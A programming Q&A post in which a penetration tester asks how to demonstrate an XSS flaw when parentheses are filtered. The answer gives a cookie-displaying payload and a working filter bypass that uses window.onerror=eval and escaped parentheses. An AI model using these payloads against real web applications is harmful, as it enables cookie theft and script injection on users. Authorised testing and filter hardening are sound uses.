M. Gamal M. Gamal - 5 days ago 4
Javascript Question

parentheses alternatives in JS , if any?

I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like

alert(document.cookie)
will be rejected because of parentheses. I can get XSS using
alert `xss`
but I my client requires a proof of being able to access the DOM.

In other words, How can I
alert(document.cookie)
without parentheses , are there any alternatives?

Thanks!

Answer

document.body.innerHTML=document.cookie will display the cookies on the page itself.

Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.

Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:

<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>

<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">

Comments